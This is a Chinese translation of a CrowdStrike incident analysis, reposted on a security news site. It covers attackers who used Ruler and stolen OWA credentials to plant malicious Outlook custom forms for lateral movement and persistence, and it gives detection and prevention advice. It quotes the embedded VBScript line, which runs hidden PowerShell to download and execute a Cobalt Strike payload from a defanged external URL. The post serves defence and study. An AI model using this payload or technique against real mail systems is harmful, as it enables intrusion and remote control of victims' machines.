又一種新的攻擊方式：使用Outlook 表單進行橫向滲透和常駐

新聞 07-24

背景

最近我們針對CrowdStrike服務進行例行調查，發現了一種攻擊方法，其主要用於橫向滲透和系統常駐，而且是以前我們沒有看到過的。這種攻擊利用Microsoft Outlook中的自定義表單（而不是宏），只需打開或預覽電子郵件就會允許Visual Basic代碼在系統上執行。

有關Outlook表單攻擊的詳細解釋可以在SensePost中找到。下面的文章詳細介紹了我們對使用這種攻擊的分析，包括攻擊過程以及檢測和預防方法。

實戰分析

接下來我們我們開始詳細的分析，並確定攻擊者已使用以前收到的憑證訪問了客戶端的單一身份驗證Outlook Web Access（OWA）伺服器。通過訪問受害者的OWA伺服器，攻擊者在受害組織的環境中為一組用戶創建了自定義消息表單。自定義表單通過電子郵件觸發時，就會允許對手在受害者系統上執行代碼。

要創建自定義表單，對手需要使用一個實用程序Ruler。在這種情況下，對手創建了一個自定義Outlook表單，啟用Visual Basic代碼執行，並將Cobalt Strike下載器嵌入到電子郵件中。每次使用自定義惡意表單向用戶發送電子郵件時，都允許shell訪問和完全讀取，寫入和執行許可權。

以下是使用Ruler創建自定義表單的示例命令，指定文件「/test/CobaltStrike.txt」，其中包含Visual Basic代碼以下載並啟動Cobalt Strike，然後發送電子郵件以觸發以下格式：

上述命令將會執行以下操作：

電子郵件包含默認的Ruler 「Invoice [Confidential]」

Cobalt Strike被下載並在受害者系統上執行，允許shell訪問對手

嵌入在對手電筒子郵件中的payload包含以下代碼，它下載並執行了Cobalt Strike的payload：

CreateObject(「WScript.Shell」).Run 「cmd /c powershell.exe -NoP -sta -w hidden -c IEX ((

new-objectnet.webclient).downloadstring(『hxxp://:80/updater』))」

對手採用這種攻擊作為一種新穎的方法在環境中橫向滲透，而不使用傳統的RDP或網路登錄，並繞過受害組織中網段之間的跳轉框。對手還利用這種攻擊來保證能常駐系統，只需通過以下示例命令將電子郵件發送到先前創建的惡意自定義表單的郵箱。

那麼我們該如何發現並進行防護呢？

發現

檢測此活動的一種方法是監視用於Ruler用戶代理字元串（即「ruler」）的OWA IIS日誌。在下面示例的OWA IIS日誌中我們可以看到使用Ruler程序訪問受害者OWA伺服器的攻擊者：

cs-method=POST cs-uri-stem=/autodiscover/autodiscover.xml cs-uri-query=- s-port=444 cs-username=DOMAINaccount c-ip=192.168.1.1 cs-version=HTTP/1.1 cs(User-Agent)=ruler cs(Referer)=- sc-status=200 sc-substatus=0 sc-win32-status=0 time-taken=31

另一種檢測方法涉及Windows註冊表。可以通過搜索註冊表來識別包含「IPM.Note」以外的值的自定義表單。在下面的示例中，自定義表單撰寫，讀取和預覽鍵將填充「IPM.Note.MaliciousForm」值：

Key: [HKEY_CURRENT_USERSoftwareMicrosoftOffice16.0OutlookCustom FormsCompose] Name: IPM.Note

Type: String

Value: IPM.Note.MaliciousForm

Key: [HKEY_CURRENT_USERSoftwareMicrosoftOffice16.0OutlookCustom FormsRead] Name: IPM.Note

Type: String

Value: IPM.Note.MaliciousForm

Key: [HKEY_CURRENT_USERSoftwareMicrosoftOffice16.0OutlookCustom FormsPreview] Name: IPM.Note

Type: String

Value: IPM.Note.MaliciousForm

最後，如果對手沒有更改默認的Ruler主題，則應檢查包含默認主題「Invoice [Confidential]」的SMTP流量。此外，監控實用程序應具有規則，配置包含默認標尺「Invoice [Confidential]」的電子郵件的警報。

預防

要執行此攻擊，對手需要訪問Microsoft Exchange伺服器，在這種情況下，該伺服器只需要單因素身份驗證。我們應確保其用戶群體的所有方面（無論是公司還是第三方）都使用雙因素身份驗證進行電子郵件訪問。

本文翻譯自

https://www.crowdstrike.com/blog/using-outlook-forms-lateral-movement-persistence/

點擊展開全文

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！

本站內容充實豐富，博大精深，小編精選每日熱門資訊，隨時更新，點擊「搶先收到最新資訊」瀏覽吧！

請您繼續閱讀更多來自 嘶吼RoarTalk 的精彩文章:

※保護內網域安全之掃描Active Directory特權和特權帳戶（一）
※一個天貓賣家的「空手套白狼」騙局：濫用中移動免流活動，加價轉賣騙錢
※Tor也加入了漏洞獎勵計劃，懸賞4000美元挖漏洞
※世界上最大的兩個暗網市場 AlphaBay與Hansa 相繼被關閉，創辦者自殺
※繞過 AppLocker 系列之弱路徑規則的利用

TAG:嘶吼RoarTalk |

您可能感興趣

※PSA：黑客用Chaos後門攻擊存在漏洞的Linux主機；伊朗黑客在最近的攻擊中使用新的木馬程序
※實用性高的那種教程：使用Tensorflow和Keras進行手寫識別
※滲透測試中的 Go 語言使用：編寫反彈後門 Hershell
※嘗試使用新的Google Play功能
※使用Pandas＆NumPy進行數據清洗的6大常用方法
※讓你更加合理的使用手機，Google Android P 正式發布
※蘋果為什麼特立獨行，使用Lightning介面？
※Nginx動態路由的新姿勢：使用Go取代lua
※net core下對於Excel的一些操作及使用
※谷歌推出可穿戴設備全新操作系統Wear OS，不再使用Android Wear
※Photoshop基礎：漸變工具的使用
※玩就是要出位，iPhone X的正確使用姿勢
※新的基準測試顯示，使用外部圖形可以增加MacBook Pro的性能
※photoshop 這樣子使用功能強大又方便的智能對象（一）
※蘋果全新iPhone大曝光：或將使用最先進的屏下指紋技術，意外嗎？
※Endnote的使用方法
※Tom Dixon 和 IKEA 的合作款發售，這也許會革新傢具的使用方式
※使用互動式 shell 來增強你的 Python
※Cobalt Strike中DNS隱蔽隧道的利用，以及使用DLP進行檢測
※蘋果正在考慮給未來的iPhone使用內凹曲面屏和手勢操作